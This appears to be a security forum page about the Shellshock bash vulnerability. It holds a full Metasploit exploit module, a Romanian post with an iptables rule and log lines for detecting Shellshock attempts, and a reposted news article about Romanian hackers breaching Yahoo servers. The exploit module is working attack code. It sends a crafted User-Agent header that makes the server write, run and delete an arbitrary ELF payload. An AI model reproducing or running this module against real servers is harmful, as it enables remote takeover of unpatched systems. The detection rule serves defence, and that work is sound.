Search the Community

This Metasploit module exploits the shellshock vulnerability in apache cgi. It allows you to execute any metasploit payload you want. ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Shellshock Bashed CGI RCE', 'Description' => %q{ This module exploits the shellshock vulnerability in apache cgi. It allows you to excute any metasploit payload you want. }, 'Author' => [ 'Stephane Chazelas', # vuln discovery 'Fady Mohamed Osman' # Metasploit module f.othman at zinad.net ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-6271' ] ], 'Payload' => { 'BadChars' => "", }, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 13 2014')) register_options( [ OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) , OptString.new('FILEPATH', [true, 'The url ', '/tmp']) ], self.class) end def exploit @payload_name = "#{rand_text_alpha(5)}" full_path = datastore['FILEPATH'] + '/' + @payload_name payload_exe = generate_payload_exe if payload_exe.blank? fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload") end peer = "#{rhost}:#{rport}" print_status("#{peer} - Creating payload #{full_path}") res = send_request_cgi({ 'method' => 'GET', 'uri' => datastore['TARGETURI'], 'agent' => "() { :;}; /bin/bash -c \"" + "printf " + "\'" + Rex::Text.hexify(payload_exe).gsub("\n",'') + "\'" + "> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\"" }) end end Source: http://dl.packetstormsecurity.net/1410-exploits/shellshock_rce.rb.txt

O regula simpla cu care puteti face logging sau puteti bloca shellshock. iptables -I INPUT -p tcp -m string --algo bm --string "() {" --dport 80 -j LOG --log-prefix "shellshock rule 1: " Cum apare ? pluto:~# dmesg [12526689.726816] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=192.185.82.92 DST=xxx.xxx.88.5 LEN=287 TOS=0x00 PREC=0x00 TTL=45 ID=21610 DF PROTO=TCP SPT=39893 DPT=80 WINDOW=229 RES=0x00 ACK PSH URGP=0 [12573352.452710] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=108.163.187.146 DST=xxx.xxx.88.10 LEN=421 TOS=0x00 PREC=0x00 TTL=48 ID=25760 DF PROTO=TCP SPT=42647 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12573362.110534] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=184.106.196.169 DST=xxx.xxx.88.7 LEN=419 TOS=0x00 PREC=0x00 TTL=48 ID=55433 DF PROTO=TCP SPT=40201 DPT=80 WINDOW=183 RES=0x00 ACK PSH URGP=0 [12573364.514235] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=110.44.30.204 DST=xxx.xxx.88.6 LEN=429 TOS=0x00 PREC=0x00 TTL=40 ID=20190 DF PROTO=TCP SPT=38820 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12573369.889964] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=194.28.86.63 DST=xxx.xxx.88.5 LEN=420 TOS=0x00 PREC=0x00 TTL=56 ID=32172 DF PROTO=TCP SPT=48732 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12576046.844450] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=72.249.151.145 DST=xxx.xxx.88.5 LEN=428 TOS=0x00 PREC=0x00 TTL=48 ID=11314 DF PROTO=TCP SPT=46735 DPT=80 WINDOW=229 RES=0x00 ACK PSH URGP=0 [12581893.832430] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=89.47.247.48 DST=xxx.xxx.88.4 LEN=427 TOS=0x00 PREC=0x00 TTL=56 ID=47806 DF PROTO=TCP SPT=40027 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582722.880301] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=394 TOS=0x00 PREC=0x00 TTL=51 ID=34666 DF PROTO=TCP SPT=45498 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582723.333809] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=397 TOS=0x00 PREC=0x00 TTL=51 ID=59992 DF PROTO=TCP SPT=45599 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582723.800026] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=370 TOS=0x00 PREC=0x00 TTL=51 ID=5234 DF PROTO=TCP SPT=45681 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582724.856256] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=367 TOS=0x00 PREC=0x00 TTL=51 ID=13614 DF PROTO=TCP SPT=45879 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582725.330168] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=379 TOS=0x00 PREC=0x00 TTL=51 ID=19157 DF PROTO=TCP SPT=45962 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582725.800422] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=397 TOS=0x00 PREC=0x00 TTL=51 ID=53517 DF PROTO=TCP SPT=46069 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582726.258118] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=370 TOS=0x00 PREC=0x00 TTL=51 ID=53738 DF PROTO=TCP SPT=46149 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582726.708889] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=180.210.205.209 DST=xxx.xxx.88.10 LEN=367 TOS=0x00 PREC=0x00 TTL=51 ID=29443 DF PROTO=TCP SPT=46236 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12582822.019042] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=23.95.95.168 DST=xxx.xxx.88.8 LEN=426 TOS=0x00 PREC=0x00 TTL=45 ID=51576 DF PROTO=TCP SPT=47145 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12583500.543438] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=173.83.247.209 DST=xxx.xxx.88.6 LEN=304 TOS=0x00 PREC=0x00 TTL=54 ID=35104 DF PROTO=TCP SPT=57258 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12584394.167981] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=103.23.21.67 DST=xxx.xxx.88.5 LEN=427 TOS=0x00 PREC=0x00 TTL=45 ID=29985 DF PROTO=TCP SPT=44368 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12606520.929034] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=94.23.42.182 DST=xxx.xxx.88.7 LEN=419 TOS=0x00 PREC=0x00 TTL=58 ID=19046 DF PROTO=TCP SPT=36147 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12606529.908862] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=85.232.60.34 DST=xxx.xxx.88.5 LEN=420 TOS=0x00 PREC=0x00 TTL=51 ID=14367 DF PROTO=TCP SPT=49751 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12606541.611815] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=67.198.141.98 DST=xxx.xxx.88.6 LEN=429 TOS=0x00 PREC=0x00 TTL=51 ID=8906 DF PROTO=TCP SPT=33844 DPT=80 WINDOW=229 RES=0x00 ACK PSH URGP=0 [12609706.584728] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=67.23.9.241 DST=xxx.xxx.88.5 LEN=428 TOS=0x00 PREC=0x00 TTL=45 ID=10222 DF PROTO=TCP SPT=43102 DPT=80 WINDOW=92 RES=0x00 ACK PSH URGP=0 [12616465.783127] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=67.23.9.241 DST=xxx.xxx.122.5 LEN=427 TOS=0x00 PREC=0x00 TTL=45 ID=24709 DF PROTO=TCP SPT=40671 DPT=80 WINDOW=92 RES=0x00 ACK PSH URGP=0 [12617580.394705] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=213.238.169.117 DST=xxx.xxx.88.8 LEN=426 TOS=0x00 PREC=0x00 TTL=47 ID=13535 DF PROTO=TCP SPT=58437 DPT=80 WINDOW=115 RES=0x00 ACK PSH URGP=0 [12619408.726456] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=202.181.246.66 DST=xxx.xxx.88.5 LEN=427 TOS=0x00 PREC=0x00 TTL=41 ID=13254 DF PROTO=TCP SPT=26414 DPT=80 WINDOW=46 RES=0x00 ACK PSH URGP=0 [12659626.759636] shellshock rule 1: IN=eth0 OUT= MAC=ac:22:0b:79:90:62:c4:71:fe:11:f9:ff:08:00 SRC=192.254.250.180 DST=xxx.xxx.102.3 LEN=293 TOS=0x00 PREC=0x00 TTL=46 ID=61584 DF PROTO=TCP SPT=22274 DPT=80 WINDOW=229 RES=0x00 ACK PSH URGP=0 Note: - Am specificat doar port 80 iar regula este doar pentru logging. Se poate adauga una pentru logging si alta pentru reject/drop - Mai multe despre shellshock aici: http://en.wikipedia.org/wiki/Shellshock_(software_bug) - Mi-a venit ideea asta pentru ca multi sunt tentati sa foloseasca snort. Probabil stiti ca la reguli multe, snort consuma foarte multe resurse CPU

Yahoo servers have been infiltrated by Romanian hackers exploiting the Shellshock bug discovered last month, according to cyber security expert Jonathan Hall. In a blog post on his website Future South, Hall detailed the process by which he discovered Yahoo, Lycos and WinZip websites had all been infiltrated by a group of Romanian hackers. Hall had Google-searched a range of codes designed to identify which servers were vulnerable to Shellshock, and found that Romanian hackers had breached two Yahoo servers and were exploring the network in search of access points for Yahoo!Games, which has millions of users. Yahoo’s servers were vulnerable to attack because they were using an old version of server technology Bash. A Yahoo told The Independent: “A security flaw, called Shellshock, that could expose vulnerabilities in many web servers was identified on September 24. As soon as we became aware of the issue, we began patching our systems and have been closely monitoring our network. Last night, we isolated a handful of our impacted servers and at this time we have no evidence of a compromise to user data. We’re focused on providing the most secure experience possible for our users worldwide and are continuously working to protect our users’ data.” Yahoo CEO Marissa Mayer was alerted to the Shellshock hacks Before releasing this information, Hall emailed Yahoo and tweeted at its engineering team and CEO Marissa Mayer. It was confirmed to him that its servers had been infiltrated but Yahoo refused to pay him for alerting them as it was not part of the company’s bug bounty programme. Yahoo is notorious for its disregard of bug bounty hunters, having last year rewarded one such hacker who identified three bugs in Yahoo's servers with a $25 voucher for company merchandise. Also in his ethical-hack investigation, Hall found that hackers were using the WinZip domain - for the zip file creator/extractor - to locate other possibly accessible servers. “This breach affects ALL of us in one way or another, and it’s crucial that this problem be resolved with haste,” Hall said. Hall informed the FBI of the hackings. Romania is known as a hub for cyber crime; more than $1 billion stolen in the US by Romanian hackers in 2012, according to the American ambassador in Bucharest. Source: independent.co.uk